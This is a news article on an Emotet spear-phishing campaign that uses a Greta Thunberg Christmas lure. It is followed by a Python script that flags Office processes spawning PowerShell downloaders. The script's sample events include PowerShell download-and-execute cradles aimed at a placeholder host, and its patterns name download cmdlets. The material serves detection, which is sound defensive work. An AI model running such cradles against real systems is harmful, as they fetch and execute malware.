The email gz attachment contains an exe. This, if opened, triggers the malware infection. Stolen data is exfiltrated via Telegram.
CERT-PA: Cybercrime combines the baits of Christmas and Greta Thunberg to deliver Emotet in Italy and worldwide. A malspam campaign is underway with spear phishing attacks
Cybercrime does not even spare Greta Thunberg as a lure to carry malware in Italy and worldwide. The alarm was raised by the CERT-PA cyber security experts over a new spear phishing campaign in progress to spread the Emotet banking trojan. The carrier is, as always, an email with a Word attachment armed with a malicious macro. The text invites the recipient to support the activities of the young environmental activist on the occasion of Christmas. The message reads: “You can spend Christmas Eve looking for gifts for children. They will say thank you only that day. But the children will thank you for life if you go out for the biggest protest against the government’s inaction in relation to the climate crisis. Support Greta Thunberg – Time person of the year 2019. I invite you. The time and address are in the attached file. FORWARD this letter to all colleagues, friends and relatives. RIGHT NOW until you forget.”
Cyber Security Experts: the numerous grammar and syntax errors in the email text make it clear that it is a scam. It is, however, very dangerous: Proofpoint, in fact, has found that the cybercriminals also target .edu domains
According to cyber security experts, it is clear that this is a scam. The entire text of the fake Greta Thunberg malicious email was evidently produced with an automatic translator, as the numerous spelling and syntax errors show. Nevertheless, this cybercrime campaign is very dangerous because, as Proofpoint has pointed out, in addition to generic domains it also targets email addresses on the .edu domain, which is reserved for schools, universities and training institutions: the institutions most involved in Greta Thunberg’s activities. The Emotet infection chain, on the other hand, is unchanged: once editing is enabled on the attached document, the macro runs and, through a PowerShell script, downloads the malware from a remote source.
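The infection chain just described (Office document, macro, PowerShell downloader) leaves a recognisable trace in endpoint telemetry: an Office process spawning powershell.exe with a download cmdlet or an encoded command. The following is an added detection example, not code from CERT-PA, Proofpoint or the article; the process-creation events it scans are constructed samples in an assumed "parent=... image=... cmdline=..." format, and the URLs use the reserved placeholder.invalid domain.

```python
import base64
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
# Cmdlets and .NET calls commonly used by macro-launched downloaders
DOWNLOAD_PATTERNS = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|invoke-expression|\biex\b", re.IGNORECASE)
# -EncodedCommand and its accepted abbreviations, followed by the base64 payload
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Assumed (constructed) event format, one event per line
EVENT_RE = re.compile(r"parent=(?P<parent>.+?) image=(?P<image>.+?) cmdline=(?P<cmdline>.*)$")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of a UTF-16LE string; return it decoded, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(line: str) -> Optional[Dict[str, object]]:
    """Flag powershell.exe spawned by an Office application; note whether it looks like a downloader."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    parent = m["parent"].rsplit("\\", 1)[-1].lower()
    image = m["image"].rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_PARENTS or image != "powershell.exe":
        return None
    decoded = decode_encoded_command(m["cmdline"]) or ""
    # Scan both the visible command line and the decoded payload, so encoding does not hide the download
    downloader = bool(DOWNLOAD_PATTERNS.search(m["cmdline"] + " " + decoded))
    return {"parent": parent, "cmdline": m["cmdline"], "decoded": decoded, "downloader": downloader}

def scan(events: List[str]) -> List[Dict[str, object]]:
    return [r for r in (analyse_event(e) for e in events) if r]

def _enc(ps: str) -> str:  # helper to build a constructed -enc sample
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")

OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not real captures
    f"parent=C:\\Windows\\explorer.exe image={OFFICE}WINWORD.EXE cmdline=WINWORD.EXE /n support_greta.doc",
    f"parent={OFFICE}WINWORD.EXE image={PS} cmdline=powershell -w hidden -ep bypass -enc "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/e')"),
    f"parent=C:\\Windows\\System32\\cmd.exe image={PS} cmdline=powershell -NoProfile -Command Get-Date",
    f"parent={OFFICE}EXCEL.EXE image={PS} cmdline=powershell (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/x','x.exe')",
    f"parent={OFFICE}WINWORD.EXE image={PS} cmdline=powershell -Command Get-Date",
]
```

Running `scan(SAMPLE_EVENTS)` yields three Office-to-PowerShell hits, two of them marked as downloaders (the encoded one only after decoding), while the cmd.exe-launched PowerShell is ignored.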